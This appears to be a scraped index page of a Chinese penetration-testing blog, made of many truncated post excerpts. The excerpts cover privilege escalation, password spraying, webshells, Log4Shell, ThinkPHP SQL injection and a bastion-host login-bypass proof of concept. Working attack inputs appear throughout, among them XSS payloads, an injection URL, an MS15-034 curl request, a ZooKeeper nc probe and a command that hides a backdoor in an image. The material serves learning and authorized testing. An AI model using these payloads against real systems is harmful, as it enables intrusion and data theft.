LiBai'S BLOG

授权项目下常规的渗透测试。欢迎朋友们积极投稿，投稿有奖励。在进行常规的渗透测试时，看到功能点要进行挨个测试，指不定就有漏洞，细心一点干就完了。授权项目上的渗透测试，漏洞有网站弱口令—存储型XSS—文件上传。本文由知识星球《网络安全情报攻防站》星友。由于是内网业务系统一发直接干进去了。首页啥都没有，找到网站后台。试试admin\admin。测试完毕，编写报告交差。

文章：https://hangchuanin.github.io/2022/12/23/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E%E9%9B%B6%E5%88%B0%E4%B8%80%E4%B9%8BWindows%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6/SPN官方文档：https://learn.microsoft.com/zh-cn/windows/win32/ad/service-principal-names。

提权思路：大概思路是通过信息搜集查找可利用的文件/脚本/软件/用户/内核漏洞/恶意劫持/特定平台漏洞/框架漏洞/组件/等，写入或执行恶意命令/脚本/shell/添加高权限用户，提权成功，然后进一步利用。当拿到webshell权限时，由于权限太低有的命令和操作执行不了，所以这时候要提权。uname -a 命令看完Linux内核，直接上扫描器。扫描一下哪些EXP能用，然后直接拿EXP冲他。

2、在WebShell中执行exe程序，执行方式为xxx.exe whoami，成功后直接执行命令，再修改命令内容，可以执行不同的命令。上传WinSysHelper.bat、explt2003.txt、expgt2003.txt，运行bat查看结果。在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp。1、直接执行exe程序，成功后会打开一个cmd窗口，在新窗口中权限就是system。然后在可利用的Exp中任意下载一个并执行即可。3、利用MSF等工具。

Windows提权在线辅助工具🌴Kernel privilege escalation vulnerability collection, with compilation environment, demo GIF map, vulnerability details, executable file (提权漏洞合集)

1、供应链攻击作战，可以见到的具体案例，具体操作流程，案例具体细节，少之又少，也没有培训机构具体讲授课程。2、红队行动演练的很多，部分攻坚细节遮遮掩掩，不做过多吐槽，apt 案例很多，也都是没有详细具体流程细节，供应链攻击事件频发，具体细节也有一些没有被公开……3、境外敌对势力网络攻击力量亡我天朝之心不死，各种牛马，啥缺德事都做尽了，攻陷我国诸多受害服务器和内网，罄竹难书……So……所以，写个帖子，先讲战略，再讲战术，供尚有红客精神的朋友们学习参考，为国争光，扬我国威。

项目是内网环境下进行，所以通过vpn接入内网之后进行目标系统的测试。（信息泄露+redis写公钥）

努力是为了不平庸~安全有些时候是枯燥的，这一次，让我们先人一步，趣学渗透！

1、密码本来源途径（信息泄露、翻配置文件、翻回收站、桌面账号密码本、mimikatz抓到的）2、喷洒的时候工具尽量放到内网机器上面，本地使用工具的线程过高流量过大会导致隧道崩掉3、喷洒时可以针对一个C段进行，这样能爆出来的机器会有很多4、内网渗透中，能获取到主机管理员账号密码，将会使我们横向事半功倍，尤其是在大内网环境中，密码复用率很高，一波喷洒，能助力你拿到一波主机，对拿到的主机再次抓取密码，再用新拿到的密码喷洒一波…，如此反复。

☠️Caesar一个全新的敏感文件发现工具文件扫描是安服的一个基本环节，网络上关于文件扫描的工具也有很多，比如御剑，7kbscan，dirsearch等，但是在实战的时候还是遇到不少的问题，比如跨平台问题以及动态404问题。所以按照自己的经验重新造了一个轮子。Golang 1.15(推荐)日志和发现的信息会保存在results目录下路径字典在assets/directory目录下，相比于其他的程序的路径文本字典，Caesar的路径字典是json，可以通过将普通路径字典转换为程序能识别的json字典。将转

Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点，应用范围广泛。Fastjson RCE关键函数：DefaultJSONParser. parseObject() 解析传入的 json 字符串提取不同的 key 进行后续的处理TypeUtils. loadClass() 根据传入的类名，生成类的实例JavaBeanDeserializer. Deserialz

开源情报文库情报搜集访问Web资源组织域名搜集获取真实IP判断是否开启CDN域名解析历史记录查询子域名扫描whois信息系统指纹探测网站技术分析端口扫描敏感信息搜集Google HackingGithub敏感信息收集SVN敏感信息泄露git信息泄露痕迹人的痕迹国内企业企业基本信息收集信息搜集工具theHarvest情报搜集访问Web资源IP+port+PathDomain+port+Path组织域名搜集确定组织名，利用搜索引擎进行组织官网检索。使用企查查类似工具检索组织。

随缘挖洞——WAF绕过

问题描述插件加载成功出现乱码解决方法在Cobalt strike目录下执行命令指定编码打开客户端解决。java -Dfile.encoding=utf-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike.jar成功解决...

加密原理第一步：“M”、“a”、"n"对应的ASCII码值分别为77，97，110，对应的二进制值是01001101、01100001、01101110。如图第二三行所示，由此组成一个24位的二进制字符串。第二步：如图红色框，将24位每6位二进制位一组分成四组，不足的补0。第三步：在上面每一组前面补两个0，扩展成32个二进制位，此时变为四个字节：00010011、00010110、00000101、00101110。分别对应的值（Base64编码索引）为：19、22、5、46。第四步：用上面的值在

find(),select(),delete()注入方法类似主要是在解析完$options之后，还对$options['where']判断了一下是否为空在 D:\phpstudy_pro\WWW\thinkphp3\Application\Home\Controller下的IndexController.class.php添加代码一样的思路，首先用id=1 and走一遍流程一直走，注意到这个地方，我们条件满足进入parseType函数注意，这时候我们的data还是1 and经过强制转换后我

漏洞描述：H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞与齐治堡垒机出现的漏洞相似漏洞复现：POC：/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin...

对一次某学院的getshell信息收集：在某fa上找到一个后台登录界面，有验证码，首先我先放弃爆破。直接试试弱口令，毕竟弱口令yyds。尝试弱口令：admin/123456一发入魂，随即找到一个上传点，之前的几个上传点被白名单限制的死死的！上????这个点任意文件上传？我人都傻了！开发怎么想的！刚才紧，现在松***访问试试，路径也给了没关系，至少是执行了！直接上冰蝎日他成功拿到shell,不再进行更深入测试，已交给edusrc...

简介CVE-2021-44228（又名 log4shell）是 Apache Log4j 库中的一个远程代码执行漏洞，该库是一种基于 Java 的日志记录工具，广泛用于世界各地的应用程序中。此漏洞允许可以控制日志消息的攻击者执行从攻击者控制的服务器加载的任意代码——我们预计大多数使用 Log4j 库的应用程序都将满足此条件。Apache Log4j2 <=2.14.1 在配置、日志消息和参数中使用的 JNDI 功能不能防止攻击者控制的 LDAP 和其他 JNDI 相关端点。当启用消息查找替换时，可

log4j RCE

全网最全合集建议收藏~

主动扫描和被动扫描的区别

ThinkPHP3.2.3 where注入断点调试强转类型进入函数在 D:\phpstudy_pro\WWW\thinkphp3\Application\Home\Controller下的IndexController.class.php添加代码先用正常id去走一遍流程，然后再使用payloadhttp://127.0.0.1/thinkphp3/index.php/home/index/getuserid?id=1)%20and%20database()=%27thinkphp3%27%20-

这是我很多年前给一个年轻人的学习建议：渗透学习建议TCP/IPHTTPSQL 注入WEB 前端TCP/IP学 TCP/IP，把 Nmap 和 Hping 的手册看一遍。http://www.nmap.com.cn/https://nmap.org/man/zh/HTTP学 HTTP，把 Curl 的手册看一遍。http://linux.51yip.com/search/curlhttps://www.php.net/manual/zh/book.curl.phpSQL 注入学

本人非网安、信安专业出身，是持证网工，持有华为HCIE-RS、软考网规。也是各大社区的创作者，C站网络领域优质创作者、华为云享专家、掘金创作者等。学习网络安全1年不到，参与过CTF比赛、awd比赛（虽然打的很菜）、担任过华为讲师，现就职于绿盟担任渗透测试人员。少就是多，慢就是快低调求发展，潜心学安全——李白前置打点、踩点：信息收集以及漏洞确认阶段，一般指的是对测试/渗透目标进行信息收集，漏洞的确认。POC：Proof of Concept，指的是漏洞验证。可以是文档、代码等。EXP：E.

1、如果提示缺少参数，如{msg：params error}，可尝使用字典模糊测试构造参数，进一步攻击。2、程序溢出，int最大值为2147483647，可尝试使用该值进行整数溢出，观察现象。3、403，404响应不灰心，尝试使用dirsearch等工具探测目录。4、验证码简单绕过：重复使用，万能验证码（0000,8888），空验证码，验证码可识别（可用PKAV HTTP Fuzzer工具识别等）5、短信轰炸绕过：手机号前加+86有可能会绕过，手机号输入邮箱，邮箱处输入手机号6、如果验证码有实效，

XSS-Payloads<!-- 仅适用于反射型XSS --!><svg/onload=eval(name)><!-- 如果你控制了 URL --> <svg/onload=eval(`'`+URL)><!-- 如果你控制了名字，但是 unsafe-eval 没有启用 --> <svg/onload=location=name><!-- 在 chrome 中，也适用于 innerHTML，即使在尚未插入 DOM

2021年10月12日青海省大学生首届网络安全知识与技能大赛落下帷幕，本人有幸在毕业之前水了大赛的一等奖。今天闲来无事记录一下。本次大赛由SangFor技术支持竞赛指南各阶段详解第一阶段：网络安全知识选择题、判断题、多选题。（垃圾常识题有手就行）第二阶段：网络安全设备配置本阶段主要配置深信防火墙AF及Windows Server2006搭建域控。任务描述你和你的团队是某公司新成立的网络安全运维部门。公司为保障内网安全决定购买防火墙来建立不同网络区域，同时为符合《网络安全法》法律

❔前言今天看到一个简单易用的 Fofa 客户端，软件是基于JDK8的。然而我的Java环境变量是JDK9，所以导致软件打不开。我安装好JDK8后发现软件还是打开不了❕骚姿势在文件路径出输入CmdE:\FofaViewer_1.1.1_JDK8>java -jar fofaviewer.jar呐，软件成功打开。????Fofa_ViewerFofa_Viewer 一个简单易用的fofa客户端，在我看来它的用处就在于批量爬取URL然后批量交SRC。软件介绍及下载https:/

webshell的含义WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。webshell的分类webshell根据脚本类型可以分为PHP脚本木马ASP脚本木马.NET脚本木马JSP脚本木马根绝时代和技术的变迁，国外也有用

KindEditor 文件上传漏洞漏洞描述影响范围漏洞验证1.查看版本信息2.漏洞验证漏洞修复漏洞描述漏洞存在于KindEditor编辑器里，你能上传.txt和.html文件，支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面，直接POST到/upload_json.*?dir=file，在允许上传的文件扩展名中包含htm

PHPInfo()信息泄漏在渗透测试中算是低危漏洞，但怎么进一步利用呢？我自己也稀里糊涂就觉得离谱。这种情况在漏洞扫描及渗透测试中经常遇到就是不知道怎么利用，找了网上很多文章都感觉说的不清不楚，自己没怎么看明白。今天我自己就总结一下。综合利用这些信息泄露配合一些其它漏洞将有可能导致系统被渗透和提权。查看phpinfo函数暴露出来的有用信息1、查看操作系统为Windows还是Linux2、查看服务器类型并按照类型和版本查找已经爆出来的漏洞综合利用3、查看网站默认路径：D:/WWW 通过mssq

站点名称站点网址Metasploitwww.metasploit.com/modules/Exploit-dbwww.exploit-db.comPacketStormpacketstormsecurity.orgSecurityFocuswww.securityfocus.com/bidSecurityReasonsecurityreason.com/exploit_alert/Security VulnsSecurity Vulns...

相信大家每学习一样东西的时候都是存在一种很迷茫的心态（包括我自己），上网找视频找文章找资料学习得零零散散，最后还是浪费时间只得到一身三脚猫功夫。很多人上来都是你报什么班，但是每一个讲师擅长和对同一个工具或知识点的理解都未必是相同的，导致你只是永远在重复别人的思路，走别人的路。只有更加系统和全面的学习（无论如何都要把基础打牢固），查漏补缺，你才会变得更强。基础打好——技术不高——思路够骚——也能日站 以下内容总结自己和各位网安入门爱好者渗透测试入门1️⃣ web 安全2️⃣ 中间件安全3️⃣ 操作系

详细描述缓慢的HTTP拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击，攻击者操纵网络上的肉鸡，对目标Web服务器进行海量HTTP请求攻击，直到服务器带宽被打满，造成了拒绝服务。慢速HTTP拒绝服务攻击经过不断的演变和发展，主要有三种攻击类型，分别是Slow headers、Slow body、Slow read。以Slow headers为例，Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部，因为HTTP头部中包含了一些Web应用可能用到的重要的信息。攻击者利用这点，发起一个HTT

以下内容并非在靶场，是在真实环境进行漏洞验证。1️⃣漏洞测试使用curl工具进行测试，测试命令：curl http://1.1.1.1 -H "Host: 1.1.1.1" -H "Range: bytes=0-18446744073709551615"2️⃣漏洞验证????利用ms15-034漏洞读取服务器内存数据借助metasploit平台：use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 1.

漏洞测试详细描述Microsoft Windows是微软发布的非常流行的操作系统。Microsoft Windows使用MHTML时存在安全漏洞，远程攻击者可利用此漏洞将任意脚本代码注入到当前浏览器会话，获取敏感信息，欺骗内容或在目标网站执行任意操作。此漏洞源于MHTML解释MIME格式请求文档中内容块的方式。在某些情况下，此漏洞可能会允许攻击者在运行在受害者IE中的Web请求的响应中注入客户端脚本。该脚本可欺骗内容、泄露信息或以目标用户身份在受影响站点进行攻击。解决办法服务器端过滤参数中的

漏洞复现http://www.xxx.cn/statics/ghx/css/default1219.css/xx.phpIIS 7/7.5在Fast-CGI运行模式下,如果在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。利用方法将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾e.g. copy xx.jpg/b + yy.txt/a xy.jpg################

漏洞验证????漏洞复现????漏洞描述????解决办法????验证方法????漏洞复现echo envi | nc 1.1.1.1 2181????漏洞描述ZooKeeper是一个分布式的，开放源码的分布式应用程序协调服务，是Google的Chubby一个开源的实现，是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件，提供的功能包括：配置维护、域名服务、分布式同步、组服务等。ZooKeeper默认开启在2181端口，在未进行任何访问控制情况下，攻击者可通过

会话变量泄漏漏洞描述：登录、验证等页面的隐藏域中存在密码信息。测试方法：查看网页源代码，寻找隐藏域中是否存在密码等信息。风险分析：攻击者通过在局域网中嗅探网络流量，获取明文传输的认证凭证，如用户名密码。风险等级：【高危】：隐藏域中存在密码等信息修复方案：禁止在前端页面中保存密码等敏感信息。html中隐藏域hidden隐藏域在页面中对于用户是不可见的，在表单中插入隐藏域的目的在于收集或发送信息，以利于被处理表单的程序所使用。基本语法： ...